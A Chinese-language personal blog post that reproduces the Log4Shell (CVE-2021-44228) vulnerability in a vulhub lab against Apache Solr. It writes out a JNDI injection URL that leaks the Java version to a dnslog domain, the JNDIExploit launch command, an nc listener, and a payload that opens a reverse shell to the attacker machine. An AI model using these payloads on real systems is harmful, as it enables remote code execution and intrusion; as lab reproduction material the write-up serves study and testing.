banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github

Log4J反序列化

环境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali 系统一个 —— 需 nc 来监听端口信息,作为攻击机
本机:中转机
centOS:靶机

地址信息:
靶机 IP:192.168.1.4:8983
本机 IP:192.168.1.2
攻击机:192.168.91.131

开启靶机环境
image.png
请求一个 DNS 域名
http://dnslog.cn/
image.png
域名:
gswq4u.dnslog.cn
打开 hackbar,先点一下 loadURL
image.png

将资料中提供的地址,复制
image.png
将后面的域名,改为刚刚申请的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
点击执行,出现下面页面
image.png

这里获得了反馈
image.png
现在打开 JNDIExploit-1.2,
输入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本机 IP
image.png
然后在攻击机,打开端口监听
命令:
nc -lvp 4444

在 hackbar 构建如下命令、
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
点击 Execute
image.png
发现监听的端口返回了 shell
image.png
到此复现完成

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。